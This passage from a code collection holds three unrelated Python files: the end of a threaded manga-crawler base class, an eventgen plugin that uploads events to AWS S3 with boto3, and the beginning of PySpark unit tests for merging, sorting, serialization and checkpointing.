cachePath: str = None, title: str = None, chapters: List[Chapter] = None,
numChapterThreads: int = 3, numPageThreads: int = 5) -> None:
super().__init__()
if url is None or url == '':
logger.error('Failed to initialize Manga, URL is None.')
raise ValueError('The URL must not be None.')
if baseDirPath is None or baseDirPath == '':
logger.error('Failed to initialize Manga, baseDirPath is None.')
raise ValueError('The baseDirPath must not be None.')
if cachePath is not None and not os.path.exists(cachePath):
logger.error('Failed to initialize Manga, cache file not found at %s.', cachePath)
raise FileNotFoundError(f'Cache file not found at {cachePath}.')
if numChapterThreads < 1:
logger.error('Failed to initialize Manga, invalid numChapterThreads: %d.',
numChapterThreads)
raise ValueError('Invalid number of chapter processing threads.')
if numPageThreads < 1:
logger.error('Failed to initialize Manga, invalid numPageThreads: %d.',
numPageThreads)
raise ValueError('Invalid number of page downloading threads.')
self.url: str = url
self.title: str = title
self.baseDirPath: str = baseDirPath
self.dirPath: str = dirPath
self.cachePath: str = cachePath
self.chapters: List[Chapter] = [] if chapters is None else chapters
self.numChapterThreads: int = numChapterThreads # The number of chapter threads
self.numPageThreads: int = numPageThreads # The number of page threads
self._killEvent = Event() # Terminates the download
self._chapterQueue = Queue() # The chapter processing queue
self._pageQueue = Queue() # The page processing queue
self._chapterThreads: List[Thread] = [] # The chapter worker threads
self._pageThreads: List[Thread] = [] # The page worker threads
self._chapterProgress: tqdm = None # The chapter progress bar
self._pageProgress: tqdm = None # The page progress bar
def toDict(self) -> dict:
"""
Returns the dictionary representation of the MangaCrawler.
"""
return {
'url': self.url,
'title': self.title,
'baseDirPath': os.path.abspath(self.baseDirPath),
'dirPath': os.path.abspath(self.dirPath),
'cachePath': os.path.abspath(self.cachePath),
'numChapterThreads': self.numChapterThreads,
'numPageThreads': self.numPageThreads,
'chapters': [chapter.toDict() for chapter in self.chapters]
}
#################################################################
# CACHE METHODS
#################################################################
def loadCache(self) -> bool:
"""
Load cache and update attributes. Does nothing if the cache path is not set.
Raises:
FileNotFoundError: If the cache file is specified but does not exist.
Returns:
True if the cache was loaded. False if there is no cached data.
"""
if self.cachePath is None:
return False
if not os.path.exists(self.cachePath):
logger.error('[%s] Failed to load cache, cache file not found at %s.',
self.url, self.cachePath)
raise FileNotFoundError(f'Cache file not found at {self.cachePath}.')
with open(self.cachePath, 'r', encoding='utf-8') as cacheFile:
cacheJson = json.load(cacheFile)
url = cacheJson['url']
baseDirPath = cacheJson['baseDirPath']
dirPath = cacheJson['dirPath']
cachePath = cacheJson['cachePath']
title = cacheJson['title']
numChapterThreads = cacheJson['numChapterThreads']
numPageThreads = cacheJson['numPageThreads']
def getPage(pageObj: Any) -> Page:
"""Convert JSON object to Page."""
idx = pageObj['idx']
pageUrl = pageObj['pageUrl']
dirPath = pageObj['dirPath']
imageUrl = pageObj['imageUrl']
return Page(idx, pageUrl, dirPath, imageUrl)
def getChapter(chapObj: Any) -> Chapter:
"""Convert JSON object to Chapter."""
idx = chapObj['idx']
url = chapObj['url']
dirPath = chapObj['dirPath']
title = chapObj['title']
pages = []
for pageObj in chapObj['pages']:
pages.append(getPage(pageObj))
return Chapter(idx, url, dirPath, title, pages)
chapters = []
for chapObj in cacheJson['chapters']:
chapters.append(getChapter(chapObj))
self.url = url
self.baseDirPath = baseDirPath
self.dirPath = dirPath
self.cachePath = cachePath
self.title = title
self.numChapterThreads = numChapterThreads
self.numPageThreads = numPageThreads
self.chapters = chapters
return True
def saveCache(self) -> None:
"""
Save the current data to the cache.
Raises:
ValueError: If the cache path is not set.
"""
if self.cachePath is None:
logger.error('[%s] Failed to save cache, cache path is not set.', self.url)
raise ValueError('The cache path is not set.')
with open(self.cachePath, 'w', encoding='utf-8') as cacheFile:
json.dump(self.toDict(), cacheFile, indent=4)
# jsonStr = json.dumps(self.toDict(), indent=4)
# cacheFile.write(jsonStr)
#################################################################
# DOWNLOAD
#################################################################
def terminate(self) -> None:
"""
Terminate the download by setting the kill event.
"""
logger.info('----- [%s] Kill event is set -----', self.url)
self._killEvent.set()
if self._chapterProgress is not None:
self._chapterProgress.close()
if self._pageProgress is not None:
self._pageProgress.close()
def download(self) -> None:
"""
Download the manga
"""
# Load the cache if the cachePath is already set
if self.cachePath is not None:
self.loadCache()
if self.url is None:
logger.error('Cannot download manga, the URL is None.')
console.error('Cannot download manga, the URL is None.')
return
logger.info('----- Starting download for %s -----', self.url)
# Initialize the title if it hasn't been set yet
self._initMangaTitle()
# If the title still hasn't been set, terminate download
if self.title is None or self.title == '':
console.error('Terminating download, failed to get manga title.')
return
console.info('Manga title: %s', self.title)
# Set the manga's dirPath and cachePath
if self.dirPath is None or self.dirPath == '':
dirName = BaseMangaCrawler.makeSafeFilename(self.title)
self.dirPath = os.path.join(self.baseDirPath, dirName)
self.cachePath = os.path.join(self.dirPath, 'cache.json')
# Now that the cachePath is already set, try to load the cache again, if it exists
if os.path.exists(self.cachePath):
self.loadCache()
# Add all chapters from the fetched chapter list to the current chapter list.
chapterList = self._fetchChapters()
for fetchedChapter in chapterList:
# Add the fetched chapter only if it does not exist in the current chapter list
if not any(fetchedChapter.title == chapter.title for chapter in self.chapters):
self.chapters.append(fetchedChapter)
# Re-sort the chapters list
self.chapters = sorted(self.chapters, key=lambda chapter: chapter.idx)
# Check the kill event
if self._killEvent.is_set():
return
# If no chapters were found, we cannot continue to process this manga
if len(self.chapters) == 0:
console.info("No chapters were found for '%s'.", self.title)
return
logger.info('[%s] Fetched %d chapters.', self.title, len(self.chapters))
# Populate the chapter queue
chapterQueueSize = 0
self._chapterQueue = Queue()
for chapter in self.chapters:
if not chapter.isDownloaded:
chapterQueueSize += 1
self._chapterQueue.put(chapter)
# Since we already know that self.chapters is not empty,
# if chapterQueueSize is zero at this point,
# it means that all chapters have already been downloaded.
# So we have nothing to process.
if chapterQueueSize == 0:
console.info('All %d chapters have already been downloaded.', len(self.chapters))
return
if chapterQueueSize < len(self.chapters):
alreadyDownloadedChapters = len(self.chapters) - chapterQueueSize
logger.info('[%s] Chapter queue contains %d chapters, '
'while %d chapters have already been downloaded.',
self.title, chapterQueueSize, alreadyDownloadedChapters)
console.info('Downloading...')
sleep(0.3)
# Initialize the progress bars
self._chapterProgress = tqdm(total=chapterQueueSize,
desc='Chapter Processing', unit='chapters')
self._pageProgress = tqdm(total=0, desc='Page Download', unit='pages')
# Start the chapter threads
self._chapterThreads = []
for _ in range(self.numChapterThreads):
t = Thread(target=self.processChapter)
self._chapterThreads.append(t)
t.start()
# Start the page threads
self._pageThreads = []
for _ in range(self.numPageThreads):
t = Thread(target=self.processPage)
self._pageThreads.append(t)
t.start()
# Wait for the threads to finish
while any(t.is_alive() for t in self._chapterThreads):
sleep(0.3)
while any(t.is_alive() for t in self._pageThreads):
sleep(0.3)
for t in self._chapterThreads:
t.join()
for t in self._pageThreads:
t.join()
# Close the progress bars
self._chapterProgress.close()
self._pageProgress.close()
#################################################################
# WORKER THREAD METHODS
#################################################################
def processChapter(self) -> None:
"""
Work function of the chapter threads.
"""
while True:
if self._killEvent.is_set():
return
if not self._chapterQueue.empty():
try:
# Get the chapter without blocking
chapter: Chapter = self._chapterQueue.get(block=False)
# Skip this chapter if all its pages have already been downloaded
if chapter.isDownloaded:
self._chapterProgress.write(f'{chapter.title} is skipped.')
self._chapterProgress.update()
self._chapterQueue.task_done()
continue
# If the chapter is not skipped, continue on to the processing below
# If the chapter's pages are already known, process using those
if chapter.hasPages:
pages = chapter.pages
# Otherwise, fetch the chapter's pages
else:
pages = self._fetchPages(chapter)
chapter.pages = pages if pages is not None else []
# Check killEvent again
if self._killEvent.is_set():
return
# Append the pages into the page queue
appendedCount = 0
for page in chapter.pages:
# But only those whose image is not yet downloaded
if not page.fileExists():
appendedCount += 1
self._pageQueue.put((page, chapter))
# Update the progress bar total
self._pageProgress.total = self._pageProgress.total + appendedCount
self._chapterProgress.update()
self._chapterQueue.task_done()
except Empty:
# Just continue the loop if the queue is empty
continue
except Exception as err: # pylint: disable=broad-except
chapterTitle = chapter.title if chapter is not None else 'Unknown Chapter'
logger.exception('[%s] Something went wrong while processing %s, %s',
self.title, chapterTitle, err)
self._chapterProgress.write(f'Failed to process {chapterTitle}.')
self._chapterProgress.update()
self._chapterQueue.task_done()
continue
else: # If chapter queue is empty
self._chapterProgress.refresh()
break
def processPage(self) -> None:
"""
Work function of the page threads.
"""
while True:
if self._killEvent.is_set():
return
page: Page = None
chapter: Chapter = None
if not self._pageQueue.empty():
try:
page, chapter = self._pageQueue.get(block=False)
# If the image already exists in its filepath, skip this page
if page.fileExists():
self._pageProgress.update()
self._pageQueue.task_done()
logger.debug('[%s] Page %d of %s is skipped.',
self.title, page.idx, chapter.title)
continue
# If the file was not yet downloaded, this page won't be skipped,
# so we continue on to the processing below.
# Cannot process if both pageUrl and imageUrl are not set
if page.pageUrl is None and page.imageUrl is None:
chapterTitle = chapter.title if chapter.title is not None \
else f'Chapter{chapter.idx:04}'
logger.exception("[%s] Failed to process page %d of %s, "
"pageUrl and imageUrl are both None.",
self.title, page.idx, chapterTitle)
self._chapterProgress.write(f'Cannot process page {page.idx} '
f'of {chapterTitle}, cannot find URL.')
self._pageProgress.update()
self._pageQueue.task_done()
continue
# Fetch the page HTML and parse the image URL from there
if page.imageUrl is None:
soup = BaseMangaCrawler.fetchHtmlSoup(page.pageUrl)
# self.parseImageUrl should not return None.
# Instead, it should raise an exception if something went wrong.
page.imageUrl = self.parseImageUrl(soup)
# Check the kill event before downloading the image
if self._killEvent.is_set():
return
# Download the image
page.download()
self._pageProgress.update()
self._pageQueue.task_done()
except Empty:
# Just continue the loop if the queue is empty
continue
except Exception as err: # pylint: disable=broad-except
pageNum = f'Page{page.idx:04}'
chapterTitle = chapter.title if chapter.title is not None \
else f'Chapter{chapter.idx:04}'
logger.exception('[%s] Something went wrong while processing %s of %s, %s',
self.title, pageNum, chapterTitle, err)
self._pageProgress.update()
self._pageQueue.task_done()
continue
else: # If page queue is empty
if self._killEvent.is_set():
return
# If all chapter threads are all dead/finished
if all(not t.is_alive() for t in self._chapterThreads):
return
sleep(0.1)
#################################################################
# PRIVATE METHODS
#################################################################
def _initMangaTitle(self) -> None:
"""
If the manga title hasn't been set yet,
fetch the manga soup and initialize the title.
"""
if self.url is None or self.url == '':
logger.error('Failed to initialize manga title, manga URL is None.')
raise ValueError('Manga URL must not be None.')
if self.title is not None and self.title != '':
# Do nothing if title is already set
return
try:
soup = BaseMangaCrawler.fetchHtmlSoup(self.url)
except Exception as err: # pylint: disable=broad-except
logger.exception('Failed to fetch manga HTML: %s, %s', self.url, err)
return
try:
self.title = self.parseMangaTitle(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('Failed to parse manga title from %s, %s', self.url, err)
def _fetchChapters(self) -> List[Chapter]:
"""
Fetch all paginations of the manga and parse all chapters.
Returns:
The list of Chapters. Returns None if something went wrong
or if the kill event was set.
"""
result: List[Chapter] = []
url = self.url
while url is not None:
# If kill event is set, stop the download
if self._killEvent.is_set():
break
console.info('Fetching chapters from %s...', url)
try:
# Fetch the manga HTML of the current pagination
soup = BaseMangaCrawler.fetchHtmlSoup(url)
# Get all the chapters from this paginated manga soup and append it to the list
chapters = self.parseChapters(url, soup)
result.extend(chapters)
# If manga is not paginated, all chapters are in the HTML soup
# that we just finished processing, so we terminate the loop.
if not self.isMangaPaginated():
break
# Get the URL of the next manga HTML pagination
url = self.getNextMangaPagination(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to load chapters from %s, %s', self.title, url, err)
console.error('Failed to load the chapters in %s', url)
break
return result
def _fetchChapterTitle(self, chapter) -> str:
"""
Fetch the main chapter HTML and parse the title.
Returns the currently set chapter title if something went wrong.
Returns:
The title of the chapter.
"""
try:
title = chapter.title
soup = BaseMangaCrawler.fetchHtmlSoup(chapter.url)
title = self.parseChapterTitle(chapter, soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to fetch chapter title from %s, %s',
self.title, chapter.url, err)
return title
def _fetchPages(self, chapter) -> List[Page]:
"""
Fetch all paginations of the chapter and parse all pages.
Returns:
The list of all pages of the given chapter.
"""
result: List[Page] = []
url = chapter.url
while url is not None:
# Terminate the thread if kill event is set
if self._killEvent.is_set():
break
try:
# Fetch the chapter HTML of the current pagination
soup = BaseMangaCrawler.fetchHtmlSoup(url)
# Get all the pages from this paginated chapter soup and append it to the list
pages = self.parsePages(url, chapter, soup)
result.extend(pages)
chapter.pages.extend(pages)
# If chapter is not paginated, all pages are in the HTML soup
# that we just finished processing, so we terminate the loop.
if not self.isChapterPaginated():
break
# Get the URL of the next chapter HTML pagination
url = self.getNextChapterPagination(soup)
except Exception as err: # pylint: disable=broad-except
logger.exception('[%s] Failed to load pages of %s from %s, %s',
self.title, chapter.title, url, err)
self._chapterProgress.write(f'Failed to load the chapter URL: {url}')
break
return result
#################################################################
# ABSTRACT METHODS
#################################################################
@abstractmethod
def parseMangaTitle(self, mangaSoup: BeautifulSoup) -> str:
"""
Parse the manga title from the soup.
Parameters:
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The manga title.
"""
@abstractmethod
def parseChapters(self, url: str, mangaSoup: BeautifulSoup) -> List[Chapter]:
"""
Parse the manga soup and create Chapters.
Parameters:
url: The URL of the manga.
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The list of Chapters created from the soup.
"""
@abstractmethod
def isMangaPaginated(self) -> bool:
"""
Returns true if the manga is paginated.
In other words, if not all chapters are listed on the main manga HTML page.
"""
@abstractmethod
def getNextMangaPagination(self, mangaSoup: BeautifulSoup) -> str:
"""
Get the URL of the next pagination of the manga HTML page.
Returns None if there is no next pagination.
Parameters:
mangaSoup: The HTML soup of the manga.
Raises:
Any and all exceptions if and when they occur.
Returns:
The URL of the next pagination. None if there is no next pagination.
"""
@abstractmethod
def isChapterPaginated(self) -> bool:
"""
Returns true if the chapter is paginated.
In other words, if not all pages are listed on the chapter HTML page.
"""
@abstractmethod
def getNextChapterPagination(self, chapterSoup: BeautifulSoup) -> str:
"""
Get the URL of the next pagination of the chapter HTML page.
Returns None if there is no next pagination.
Parameters:
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The URL of the next pagination. None if there is no next pagination.
"""
@abstractmethod
def parseChapterTitle(self, chapter: Chapter, chapterSoup: BeautifulSoup) -> str:
"""
Parse the chapter title from the soup.
Parameters:
chapter: The chapter.
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The chapter title.
"""
@abstractmethod
def parsePages(self, url: str, chapter: Chapter, chapterSoup: BeautifulSoup) -> List[Page]:
"""
Parse the chapter soup and create Pages.
Parameters:
url: The URL of the chapter.
chapter: The chapter.
chapterSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The list of Pages created from the soup.
"""
@abstractmethod
def parseImageUrl(self, pageSoup: BeautifulSoup) -> str:
"""
Parse the image URL from the soup.
Parameters:
pageSoup: The HTML soup of the chapter.
Raises:
Any and all exceptions if and when they occur.
Returns:
The image URL.
"""
#################################################################
# HELPER METHODS
#################################################################
@staticmethod
@lru_cache(maxsize=32)
def fetchHtmlSoup(url: str) -> BeautifulSoup:
"""
Fetch an HTML page and return its soup.
Raises an error if the fetching or the parsing failed.
"""
try:
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
return soup
except Exception as err:
logger.exception('Failed to fetch HTML soup of %s, %s', url, err)
raise err
@staticmethod
@lru_cache(maxsize=32)
def makeSafeFilename(filename: str) -> str:
"""
Makes the filename Windows-safe by removing unsafe characters.
"""
keepChars = (' ', '.', '_', '-', "'", '(', ')')
return "".join(c for c in filename if c.isalnum() or c in keepChars).strip()
|
awss3.py
|
from __future__ import division
from outputplugin import OutputPlugin
import requests
try:
import boto3
import botocore.exceptions
boto_imported = True
except ImportError:
boto_imported = False
import uuid
import datetime
import threading
import logging
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class AwsS3OutputPlugin(OutputPlugin):
'''
AwsS3 output will enable events that are generated to be sent directly
to AWS S3 through the boto3 API. In order to use this plugin,
you will need to supply AWS setting in config file.
'''
name = 'awsS3'
useOutputQueue = False
# MAXQUEUELENGTH = 100
validSettings = ['awsS3BucketName', 'awsS3CompressionType',
'awsS3EventType', 'awsS3ObjectPrefix',
'awsS3ObjectSuffix', 'awsRegion', 'awsKeyId',
'awsSecretKey', 'awsS3EventPerKey']
defaultableSettings = ['awsKeyId', 'awsSecretKey', 'awsS3EventType',
'awsS3CompressionType', 'awsS3ObjectPrefix',
'awsS3ObjectSuffix']
def __init__(self, sample):
# Override maxQueueLength to EventPerKey so that each flush
# will generate one aws key
if sample.awsS3EventPerKey:
sample.maxQueueLength = sample.awsS3EventPerKey
OutputPlugin.__init__(self, sample)
if not boto_imported:
self.logger.error("There is no boto3 or botocore library available")
return
# disable any "requests" warnings
requests.packages.urllib3.disable_warnings()
# Bind passed in samples to the outputter.
self.awsS3compressiontype = sample.awsS3CompressionType if hasattr(
sample,
'awsS3CompressionType') and sample.awsS3CompressionType else None
self.awsS3eventtype = sample.awsS3EventType if hasattr(
sample, 'awsS3EventType') and sample.awsS3EventType else 'syslog'
self.awsS3objectprefix = sample.awsS3ObjectPrefix if hasattr(
sample, 'awsS3ObjectPrefix') and sample.awsS3ObjectPrefix else ""
self.awsS3objectsuffix = sample.awsS3ObjectSuffix if hasattr(
sample, 'awsS3ObjectSuffix') and sample.awsS3ObjectSuffix else ""
self.awsS3bucketname = sample.awsS3BucketName
self.logger.debug("Setting up the connection pool for %s in %s" %
(self._sample.name, self._app))
self._client = None
self._createConnections(sample)
self.logger.debug("Finished init of awsS3 plugin.")
def _createConnections(self, sample):
try:
if hasattr(sample, 'awsKeyId') and hasattr(sample, 'awsSecretKey'):
self._client = boto3.client(
"s3",
region_name=sample.awsRegion,
aws_access_key_id=sample.awsKeyId,
aws_secret_access_key=sample.awsSecretKey)
if self._client is None:
msg = '''
[your_eventgen_stanza]
awsKeyId = YOUR_ACCESS_KEY
awsSecretKey = YOUR_SECRET_KEY
'''
self.logger.error(
"Failed for init boto3 client: %s, you should define correct 'awsKeyId'\
and 'awsSecretKey' in eventgen conf %s" % msg)
raise
else:
self._client = boto3.client('s3', region_name=sample.awsRegion)
except Exception as e:
self.logger.error("Failed for init boto3 client: exception = %s" % e)
raise e
# Try list bucket method to validate if the connection works
try:
self._client.list_buckets()
except botocore.exceptions.NoCredentialsError:
msg = '''
[default]
aws_access_key_id = YOUR_ACCESS_KEY
aws_secret_access_key = YOUR_SECRET_KEY
'''
self.logger.error("Failed for init boto3 client, you should create "
"'~/.aws/credentials' with credential info %s" % msg)
raise
self.logger.debug("Init conn done, conn = %s" % self._client)
def _sendPayloads(self, payload):
currentreadsize = 0
currentreadevent = 0
stringpayload = []
totalbytesexpected = 0
totalbytessent = 0
numberevents = len(payload)
self.logger.debug("Sending %s events to s3 key" % numberevents)
self._transmitEvents(payload)
def _transmitEvents(self, payloadstring):
self.logger.debug("Transmission called with payloadstring event number: %d "
% len(payloadstring))
records = "".join(payloadstring)
# Different key prefix for different log type
if self.awsS3eventtype == 'elbaccesslog':
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).strftime("%Y%m%dT%H%MZ") + '_' + str(uuid.uuid1(
)) + self.awsS3objectsuffix
elif self.awsS3eventtype == 's3accesslog':
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).strftime("%Y-%m-%d-%H-%M-%S") + '-' + str(uuid.uuid1()).replace(
'-', '').upper()[0:15] + self.awsS3objectsuffix
else:
s3keyname = self.awsS3objectprefix + datetime.datetime.utcnow(
).isoformat() + str(uuid.uuid1()) + self.awsS3objectsuffix
self.logger.debugv("Uploading %d events into s3 key: %s " %
(len(records), s3keyname))
if self.awsS3compressiontype == 'gz':
import StringIO
import gzip
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(records)
records = out.getvalue()
try:
response = self._client.put_object(Bucket=self.awsS3bucketname,
Key=s3keyname,
Body=records)
self.logger.debugv("response = %s" % response)
except Exception as e:
self.logger.error("Failed for exception: %s" % e)
self.logger.debugv("Failed sending events to payload: %s" %
(payloadstring))
raise e
def flush(self, q):
self.logger.debug("Flush called on awsS3 plugin with length %d" % len(q))
if len(q) > 0:
try:
payload = []
self.logger.debug("Currently being called with %d events" % len(q))
for event in q:
if event.get('_raw') is None:
self.logger.error(
'failure outputting event, does not contain _raw')
else:
payload.append(event['_raw'])
self.logger.debug(
"Finished processing events, sending all to AWS S3")
self._sendPayloads(payload)
except Exception as e:
import traceback
self.logger.error(traceback.print_exc())
self.logger.error('failed sending events, reason: %s ' % e)
def _setup_logging(self):
self.logger = logging.getLogger('eventgen')
def load():
"""Returns an instance of the plugin"""
return AwsS3OutputPlugin
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 14
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10, partitions=3)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
from StringIO import StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + range(1000), list(ser.load_stream(io)))
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
